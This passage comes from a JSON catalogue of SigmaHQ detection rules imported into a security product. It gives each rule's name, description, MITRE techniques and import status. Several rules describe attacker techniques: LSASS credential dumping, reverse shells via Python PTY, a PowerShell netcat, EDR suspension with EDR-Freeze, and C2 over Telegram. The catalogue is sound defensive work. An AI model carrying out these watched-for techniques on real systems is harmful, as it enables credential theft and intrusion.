"description": "Detects changes to the registry values related to outlook security settings", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1137" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outlook-security-settings-updated-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_outlook_security_settings.yml" } }, { "id": "sigmahq-sigma-c3d76afc-93df-461e-8e67-9b2bad3f2ac4", "type": "detection", "name": "File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell", "description": "Detects the initial execution of \"cmd.exe\" which spawns \"explorer.exe\" with the appropriate command line arguments for opening the \"My Computer\" folder.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1135" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-explorer-folder-opened-using-explorer-folder-shortcut-via-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c3d76afc-93df-461e-8e67-9b2bad3f2ac4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary.yml" } }, { "id": "sigmahq-sigma-c3dbbc9f-ef1d-470a-a90a-d343448d5875", "type": "detection", "name": "Suspicious Non-Browser Network Communication With Telegram API", "description": "Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1102", "T1567", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-non-browser-network-communication-with-telegram-api.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c3dbbc9f-ef1d-470a-a90a-d343448d5875", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_telegram_api_non_browser_access.yml" } }, { "id": "sigmahq-sigma-c3e5c1b1-45e9-4632-b242-27939c170239", "type": "detection", "name": "Sysmon Blocked File Shredding", "description": "Triggers on any Sysmon \"FileBlockShredding\" event, which indicates a violation of the configured shredding policy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-blocked-file-shredding.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC 
engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c3e5c1b1-45e9-4632-b242-27939c170239", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/sysmon/sysmon_file_block_shredding.yml" } }, { "id": "sigmahq-sigma-c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", "type": "detection", "name": "WerFault LSASS Process Memory Dump", "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/werfault-lsass-process-memory-dump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml" } }, { "id": "sigmahq-sigma-c3edc6a5-d9d4-48d8-930e-aab518390917", "type": "detection", "name": "Potential Persistence Via Outlook Form", "description": "Detects the creation of a new Outlook form which can contain malicious code", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1137.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/potential-persistence-via-outlook-form.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c3edc6a5-d9d4-48d8-930e-aab518390917", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_outlook_newform.yml" } }, { "id": "sigmahq-sigma-c3f265c7-ff03-4056-8ab2-d486227b4599", "type": "detection", "name": "Restore Public AWS RDS Instance", "description": "Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1020" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/restore-public-aws-rds-instance.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c3f265c7-ff03-4056-8ab2-d486227b4599", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_rds_public_db_restore.yml" } }, { "id": "sigmahq-sigma-c4042d54-110d-45dd-a0e1-05c47822c937", "type": "detection", "name": "Python Spawning Pretty TTY Via PTY Module", "description": "Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-spawning-pretty-tty-via-pty-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c4042d54-110d-45dd-a0e1-05c47822c937", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml" } }, { "id": "sigmahq-sigma-c420410f-c2d8-4010-856b-dffe21866437", "type": "detection", "name": "Enable LM Hash Storage", "description": "Detects changes to the \"NoLMHash\" registry value in order to allow Windows to store LM Hashes.\nBy setting this registry value to \"0\" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enable-lm-hash-storage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c420410f-c2d8-4010-856b-dffe21866437", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_system_lsa_nolmhash.yml" } }, { "id": "sigmahq-sigma-c42a3073-30fb-48ae-8c99-c23ada84b103", "type": "detection", "name": "Hack Tool User Agent", 
"description": "Detects suspicious user agent strings used by hack tools in proxy logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hack-tool-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c42a3073-30fb-48ae-8c99-c23ada84b103", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_hacktool.yml" } }, { "id": "sigmahq-sigma-c43a5405-e8e1-4221-9ac9-dbe3fa14e886", "type": "detection", "name": "System Language Discovery via Reg.Exe", "description": "Detects the usage of Reg.Exe to query system language settings.\nAttackers may discover the system language to determine the geographic location of victims, customize payloads for specific regions,\nor avoid targeting certain locales to evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1614.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-language-discovery-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c43a5405-e8e1-4221-9ac9-dbe3fa14e886", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/windows/process_creation/proc_creation_win_reg_system_language_discovery.yml" } }, { "id": "sigmahq-sigma-c43c26be-2e87-46c7-8661-284588c5a53e", "type": "detection", "name": "A Member Was Added to a Security-Enabled Global Group", "description": "Detects activity when a member is added to a security-enabled global group", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/a-member-was-added-to-a-security-enabled-global-group.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c43c26be-2e87-46c7-8661-284588c5a53e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml" } }, { "id": "sigmahq-sigma-c443012c-7928-43bf-ac20-7eda5efe61ad", "type": "detection", "name": "Suspicious Uninstall of Windows Defender Feature via PowerShell", "description": "Detects the use of PowerShell with Uninstall-WindowsFeature or Remove-WindowsFeature cmdlets to disable or remove the Windows Defender GUI feature, a common technique used by adversaries to evade defenses.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-uninstall-of-windows-defender-feature-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "c443012c-7928-43bf-ac20-7eda5efe61ad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_uninstall_defender_feature.yml" } }, { "id": "sigmahq-sigma-c453ab7a-1f5c-4716-a3b4-dea8135fb43a", "type": "detection", "name": "Registry Manipulation via WMI Stdregprov", "description": "Detects the usage of wmic.exe to manipulate Windows registry via the WMI StdRegProv class.\nThis behaviour could be potentially suspicious because it uses an alternative method to modify registry keys instead of legitimate registry tools like reg.exe or regedit.exe.\nAttackers specifically choose this technique to evade detection and bypass security monitoring focused on traditional registry modification commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1112", "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-manipulation-via-wmi-stdregprov.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c453ab7a-1f5c-4716-a3b4-dea8135fb43a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_stdregprov_reg_modification.yml" } }, { "id": "sigmahq-sigma-c4568f5d-131f-4e78-83d4-45b2da0ec4f1", "type": "detection", "name": "Communication To LocaltoNet Tunneling Service Initiated - Linux", "description": "Detects an executable initiating a network connection to \"LocaltoNet\" 
tunneling sub-domains.\nLocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.\nAttackers have been seen using this service for command-and-control activities to bypass MFA and perimeter controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1090", "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/communication-to-localtonet-tunneling-service-initiated-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c4568f5d-131f-4e78-83d4-45b2da0ec4f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/network_connection/net_connection_lnx_domain_localtonet_tunnel.yml" } }, { "id": "sigmahq-sigma-c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", "type": "detection", "name": "Suspicious PsExec Execution", "description": "Detects execution of PsExec or PAExec with a renamed service name. This rule helps to filter out the noise if PsExec is used for legitimate purposes, or if an attacker uses a PsExec client other than the Sysinternals one.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-psexec-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_psexec.yml" } }, { "id": "sigmahq-sigma-c484e533-ee16-4a93-b6ac-f0ea4868b2f1", "type": "detection", "name": "HackTool - SharpUp PrivEsc Tool Execution", "description": "Detects the use of SharpUp, a tool for local privilege escalation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1615", "T1569.002", "T1574.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpup-privesc-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharpup.yml" } }, { "id": "sigmahq-sigma-c49c5062-0966-4170-9efd-9968c913a6cf", "type": "detection", "name": "Stop Windows Service Via PowerShell Stop-Service", "description": "Detects the stopping of a Windows service via the PowerShell Cmdlet \"Stop-Service\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/stop-windows-service-via-powershell-stop-service.yaml", "quarantine_reason": "imported rule; upstream query 
language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c49c5062-0966-4170-9efd-9968c913a6cf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_stop_service.yml" } }, { "id": "sigmahq-sigma-c4b890e5-8d8c-4496-8c66-c805753817cd", "type": "detection", "name": "Potential Process Hollowing Activity", "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-process-hollowing-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c4b890e5-8d8c-4496-8c66-c805753817cd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_tampering/proc_tampering_susp_process_hollowing.yml" } }, { "id": "sigmahq-sigma-c4e06896-e27c-4583-95ac-91ce2279345d", "type": "detection", "name": "Potential XXE Exploitation Attempt In JVM Based Application", "description": "Detects XML parsing issues, if the application expects to work with XML make sure that the parser is initialized safely.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", 
"tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-xxe-exploitation-attempt-in-jvm-based-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c4e06896-e27c-4583-95ac-91ce2279345d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/jvm/java_xxe_exploitation_attempt.yml" } }, { "id": "sigmahq-sigma-c4e49831-1496-40cf-8ce1-b53f942b02f9", "type": "detection", "name": "Renamed PAExec Execution", "description": "Detects execution of renamed version of PAExec. Often used by attackers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-paexec-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_paexec.yml" } }, { "id": "sigmahq-sigma-c4e92a97-a9ff-4392-9d2d-7a4c642768ca", "type": "detection", "name": "Service Installed By Unusual Client - Security", "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": 
null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-installed-by-unusual-client-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml" } }, { "id": "sigmahq-sigma-c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", "type": "detection", "name": "Scheduled Task Executing Encoded Payload from Registry", "description": "Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scheduled-task-executing-encoded-payload-from-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml" } }, { "id": "sigmahq-sigma-c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", "type": "detection", "name": "ProcessHacker Privilege Elevation", "description": "Detects a ProcessHacker tool that 
elevated privileges to a very high level", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/processhacker-privilege-elevation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_pua_proceshacker.yml" } }, { "id": "sigmahq-sigma-c52a914f-3d8b-4b2a-bb75-b3991e75f8ba", "type": "detection", "name": "Binary Padding - Linux", "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware.\nThis rule detects the use of dd and truncate to add junk data to a file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/binary-padding-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c52a914f-3d8b-4b2a-bb75-b3991e75f8ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_binary_padding.yml" } }, { "id": 
"sigmahq-sigma-c539afac-c12a-46ed-b1bd-5a5567c9f045", "type": "detection", "name": "Potential Remote PowerShell Session Initiated", "description": "Detects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account.\nThis could potentially indicate a remote PowerShell connection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-remote-powershell-session-initiated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_susp_remote_powershell_session.yml" } }, { "id": "sigmahq-sigma-c57872c7-614f-4d7f-a40d-b78c8df2d30d", "type": "detection", "name": "Assembly Loading Via CL_LoadAssembly.ps1", "description": "Detects calls to \"LoadAssemblyFromPath\" or \"LoadAssemblyFromNS\" that are part of the \"CL_LoadAssembly.ps1\" script. 
This can be abused to load different assemblies and bypass App locker controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/assembly-loading-via-cl-loadassembly-ps1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_cl_loadassembly.yml" } }, { "id": "sigmahq-sigma-c598cc0c-9e70-4852-b9eb-8921af79f598", "type": "detection", "name": "Hacktool - EDR-Freeze Execution", "description": "Detects execution of EDR-Freeze, a tool that exploits the MiniDumpWriteDump function and WerFaultSecure.exe to suspend EDR and Antivirus processes on Windows.\nEDR-Freeze leverages a race-condition attack to put security processes into a dormant state by suspending WerFaultSecure at the moment it freezes the target process.\nThis technique does not require kernel-level exploits or BYOVD, but instead abuses user-mode functionality to temporarily disable monitoring by EDR or Antimalware solutions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-edr-freeze-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the 
AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c598cc0c-9e70-4852-b9eb-8921af79f598", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_edr_freeze.yml" } }, { "id": "sigmahq-sigma-c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", "type": "detection", "name": "Replace Desktop Wallpaper by Powershell", "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1491.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/replace-desktop-wallpaper-by-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_wallpaper.yml" } }, { "id": "sigmahq-sigma-c5b20776-639a-49bf-94c7-84f912b91c15", "type": "detection", "name": "Netcat The Powershell Version", "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1095", 
